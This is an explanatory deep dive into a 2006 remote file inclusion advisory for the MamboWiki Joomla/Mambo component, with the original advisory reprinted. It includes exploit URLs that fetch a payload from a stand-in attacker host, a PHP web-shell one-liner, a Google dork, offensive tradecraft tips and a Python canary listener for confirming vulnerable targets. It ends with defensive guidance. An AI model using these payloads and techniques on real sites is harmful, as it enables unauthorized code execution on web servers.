Understanding MamboWiki Remote File Inclusion: A Historical Exploit Deep Dive

What this paper is
This paper is a security advisory published in 2006 by "camino" from the "Insecurity Research Team." It details a Remote File Inclusion (RFI) vulnerability found in MamboWiki, a component for the Mambo/Joomla Content Management System (CMS), specifically affecting versions up to and including 0.9.6. The advisory explains how an attacker can exploit this vulnerability to include and execute arbitrary files from a remote server, leading to potential code execution on the target web server.
Simple technical breakdown
The vulnerability lies in how MamboLogin.php handles a variable named IP. The advisory shows only the exploit URL, not the code, but the URL implies that the script hands IP to a file-inclusion call (include() or require()) without checking it. An attacker who can set IP to a URL pointing at a script on a server they control makes the target's PHP interpreter fetch that script and execute it as if it were a local file, which is remote code execution. The advisory's fix (a defined( '_VALID_MOS' ) or die(...) guard that rejects direct requests to the file) suggests that IP is a variable the component expects the CMS to have set before loading the file, and that a direct request lets the attacker supply it from the query string instead; that pattern was common in Mambo/Joomla components of the period, when PHP's register_globals was frequently enabled. This is an inference from the fix, not something the advisory states.
Complete code and payload walkthrough
The advisory contains no executable code or shellcode; it describes the vulnerability and gives a URL pattern for exploitation.
- Vulnerable file: MamboLogin.php (within the com_mambowiki component).
- Vulnerable parameter: IP, which the advisory implies is used for file inclusion.
- Exploit URL pattern:
  http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP=http://huh?
Explanation of the exploit URL pattern:
- http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php: the base URL of the vulnerable script on the target Mambo/Joomla installation. [sitepath] is the domain or IP address of the target site, [joomlapath] is the directory in which Joomla or Mambo is installed, and components/com_mambowiki/MamboLogin.php is the path to the vulnerable component file.
- ?IP=: the start of the query string, with IP as the parameter name.
- http://huh?: a placeholder for the attacker-controlled remote file. The http:// prefix makes the value a URL rather than a local path; huh is a stand-in host, and an attacker would substitute the URL of a script they host, e.g. http://attacker.com/malicious.txt. The trailing ? is a common RFI idiom: if the script appends anything to the value before including it (a file name or extension), that suffix lands in the URL's query string instead of its path, so the attacker's file is still the one fetched.
How it works (conceptual):
- The attacker crafts a URL such as http://target.com/mambo/components/com_mambowiki/MamboLogin.php?IP=http://attacker.com/shell.txt and sends it to the target web server.
- MamboLogin.php, if vulnerable, takes the value of IP (http://attacker.com/shell.txt) and passes it to include() or require().
- When PHP's remote-include support is enabled (allow_url_fopen on the PHP 4 and 5.0/5.1 releases current in 2006; from PHP 5.2.0 onward allow_url_include must also be On), include() and require() fetch the content from the remote URL over HTTP.
- If the fetched content contains PHP code (e.g. shell.txt holding <?php system($_GET['cmd']); ?>), the target server executes it. Serving the payload with a non-PHP extension such as .txt matters: the attacker's own web server must deliver the source as plain text rather than executing it locally.
Mapping: MamboLogin.php?IP=http://attacker.com/malicious.txt -> Remote File Inclusion leading to Remote Code Execution. The exploit is pure URL manipulation; the advisory provides no code or shellcode to analyse directly.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated (remote). This is a classic web application vulnerability that can be triggered by any user who can send HTTP requests to the target.
- Lab Preconditions:
  - A vulnerable Mambo/Joomla installation with the com_mambowiki component at version <= 0.9.6. This is the critical prerequisite; reproducing such an old environment may require period-appropriate OS, PHP and web server versions, with PHP configured to allow remote includes.
  - A separate server controlled by the operator to host the payload (e.g. a PHP web shell served as plain text).
  - Network connectivity from the target to the operator's payload server. The target initiates the outbound HTTP fetch, so egress filtering on the target side blocks the attack.
- Tooling Assumptions:
  - Web browser for manual testing or reconnaissance.
  - HTTP request manipulation tools (e.g. Burp Suite, OWASP ZAP) to craft and send requests.
  - A simple web server (e.g. Python's http.server, Apache, Nginx) on the operator's machine to serve the payload.
  - A payload file (e.g. a PHP web shell such as shell.txt containing <?php system($_GET['cmd']); ?>, named .txt so the payload server does not execute it).
- Execution Pitfalls:
  - WAF/IPS detection: modern web application firewalls and intrusion prevention systems ship signatures for RFI, and a query value beginning with http:// or ftp:// is one of the most reliably matched patterns, so the request is likely to be blocked on any instrumented target.
  - Server configuration: PHP only fetches URLs in include() when allow_url_fopen is On and, from PHP 5.2.0 onward, allow_url_include is also On (it defaults to Off). Either setting being disabled defeats this exploit even when the code is vulnerable; include() then fails with a warning instead of fetching the file.
  - Component not installed: the com_mambowiki component may be absent from the target site.
  - Incorrect path: a wrong [sitepath] or [joomlapath] yields a 404.
  - Payload detection: the content of the remote file may be detected by security software on the target if it is obviously malicious, and the fetched URL appears in the target's outbound traffic.
  - Obfuscation: simple payloads may be detected and more sophisticated ones may be needed, but whether the include happens at all is the primary hurdle; confirming that with a harmless canary before staging a shell avoids burning a payload.
- Tradecraft Considerations:
  - Reconnaissance: identifying the Mambo/Joomla version and installed components is crucial. The dork inurl:"com_mambowiki" given in the advisory is the stated way to find candidate sites.
  - Payload hosting: ensure the payload server is stable and reachable from the target, and prefer a hosting domain that does not immediately look malicious.
  - Post-exploitation: once a web shell is obtained the attacker can move on to further actions; the RFI is only the entry point.
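The pitfalls above reduce to one question an operator wants answered before staging anything: does the target's PHP actually fetch and run a remote include? The listener below is an added example, not part of the advisory or any MamboWiki code. It serves a harmless PHP canary that only echoes a marker string and records every client that fetches it: a recorded hit shows the target fetched the URL, and the marker appearing in the target's response shows it executed the fetched code. The host names, port, paths and marker string are assumptions; the parameter name IP, the script path and the trailing-? idiom come from the advisory's URL pattern.

```python
"""Canary listener for confirming that a target performs remote includes.

Added example; not part of the original advisory. Before staging a real
payload, an operator in a lab points the vulnerable parameter at this
listener, which serves a harmless PHP canary (it only echoes a marker) and
records every client that fetches it. Host names, ports, paths and the
marker are assumptions made for this example.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CANARY_PATH = "/canary.txt"
CANARY_MARKER = "rfi-canary-7f3a"
# Served as .txt so the listener's own web server never executes it.
CANARY_BODY = f"<?php echo '{CANARY_MARKER}'; ?>\n"


class CanaryServer(ThreadingHTTPServer):
    """HTTP server that remembers (client ip, path, user agent) per fetch."""

    def __init__(self, address):
        super().__init__(address, CanaryHandler)
        self.hits = []
        self._lock = threading.Lock()

    def record(self, client_ip, path, user_agent):
        with self._lock:
            self.hits.append((client_ip, path, user_agent))


class CanaryHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # A vulnerable script that appends a suffix to the parameter sends
        # e.g. /canary.txt?/config.php (the trailing '?' trick); discard the
        # query so the suffix never changes which file is served.
        path = self.path.split("?", 1)[0]
        self.server.record(self.client_address[0], path,
                           self.headers.get("User-Agent", ""))
        if path != CANARY_PATH:
            self.send_error(404)
            return
        body = CANARY_BODY.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # hits are kept in server.hits instead of stderr noise


def start_canary_server(host="127.0.0.1", port=0):
    """Serve in a daemon thread; returns (server, bound_port). port=0 picks a free port."""
    srv = CanaryServer((host, port))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def exploit_url(site, joomla_path, canary_url):
    """The advisory's URL pattern with the canary URL as the IP value; the
    trailing '?' turns anything the script appends into a query string."""
    base = f"{site.rstrip('/')}/{joomla_path.strip('/')}/components/com_mambowiki/MamboLogin.php"
    return f"{base}?IP={canary_url}?"


def canary_fetches(srv):
    """Number of recorded fetches of the canary path."""
    return sum(1 for _, path, _ in srv.hits if path == CANARY_PATH)


def http_get(url, timeout=5):
    """Minimal client used to self-test the listener from the same host."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    server, port = start_canary_server("0.0.0.0")
    # Replace 127.0.0.1 with an address the target can reach (assumption).
    canary = f"http://127.0.0.1:{port}{CANARY_PATH}"
    print("Request this on the target:", exploit_url("http://target.example", "mambo", canary))
    print("Listening; Ctrl-C to stop.")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        server.shutdown()
```

If the listener records no hit, the script either is not vulnerable, cannot reach you, or runs with allow_url_fopen/allow_url_include disabled; if it records a hit but the marker never appears in the target's response, the file was fetched but not executed (for example because of a suffix or a different include call than assumed). Only after both checks pass is a real payload worth staging.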
Where this was used and when
- Context: this vulnerability was relevant to attackers targeting sites running the Mambo or Joomla CMS with the com_mambowiki component installed at a vulnerable version.
- Approximate date: published on August 18, 2006 (on milw0rm, now mirrored as Exploit-DB paper 2213). Exploitation would have been possible from then until affected sites applied the fix or upgraded the component.
Defensive lessons for modern teams
- Input validation is paramount: validate all user-supplied input, especially values used in file inclusion, database queries or system commands. Here IP was treated as a trusted file path. For include targets the safe pattern is an allowlist that maps a short name to a fixed local file; never build the include path from a request value.
- Secure configuration: keep allow_url_include Off (its default since PHP 5.2.0; the directive is deprecated as of PHP 7.4) and disable allow_url_fopen unless legitimate functionality needs it. Either setting being Off stops URL-based RFI, and allow_url_include also gates the data: and php://input wrappers, but neither setting stops local file inclusion or the php://filter wrapper, so validation is still required. Note too that the advisory's fix only rejects direct requests to MamboLogin.php; it does not validate IP, so the script remains dependent on the CMS setting that variable.
- Patch management: keep CMS platforms, components and plugins at current versions. This vulnerability was addressed by adding a single guard line near the top of the file.
- Web application firewalls: deploy and tune WAFs to block common web attack patterns, including RFI attempts, and log the blocks, since a blocked RFI request is a clear indicator of targeting.
- Least privilege: run web server processes with the minimum necessary privileges to limit the impact of a compromise, and restrict outbound HTTP from web servers so that a vulnerable include cannot reach an attacker's host.
- Code review: review custom and third-party code for RFI, LFI, SQLi and similar classes; grep for include/require calls whose argument derives from request data.
ASCII visual (if applicable)
This vulnerability is a direct interaction between a web client and a web server script. The diagram below shows the flow of the request and the inclusion.

+-----------------+   HTTP request    +-----------------+   include()       +-----------------+
| Attacker's      | ----------------> | Target web      | ----------------> | Attacker's      |
| machine         |  (malicious URL)  | server          |  (fetches URL)    | payload server  |
| (e.g. Kali)     |                   | (vulnerable     |                   | (e.g. Apache)   |
|                 |                   |  MamboLogin.php)| <---------------- |                 |
+-----------------+                   +-----------------+   payload body    +-----------------+
        ^                                      |
        |        HTTP response (output of executed code)
        +--------------------------------------+

Explanation:
- The attacker crafts a URL pointing to the vulnerable script on the target server, with a parameter whose value is a URL to their own payload.
- The target web server receives the request and passes it to MamboLogin.php, which, because of the vulnerability, treats the parameter as a file to include and issues an HTTP request to the attacker's payload server.
- The attacker's server responds with the payload (e.g. a PHP web shell).
- The target server's PHP interpreter executes the received payload.
- The output of the execution is returned to the attacker in the HTTP response.
Source references
- Paper URL: https://www.exploit-db.com/papers/2213
- Exploit-DB Raw URL: https://www.exploit-db.com/raw/2213
- Affected Application: MamboWiki <= v0.9.6
- Author: camino (Insecurity Research Team)
- Published: 2006-08-18
Original Exploit-DB Content (Verbatim)
.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 18.o8.2oo6 ..
Affected Application: MamboWiki <= v0.9.6
(Mambo/Joomla CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discovered by: camino
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: camino[at]sexmagnet[dot]com
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Type: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [ ] High [x]
Application: MamboWiki
Version: <= 0.9.6
Vulnerable File: MamboLogin.php
URL: http://www.lyquidity.com
Description: A component like Wikipedia for Joomla/Mambo.
Dork: inurl:"com_mambowiki"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP=http://huh?
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open MamboLogin.php
o2.) add this in line 8:
defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );
o3.) done!
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)
# milw0rm.com [2006-08-18]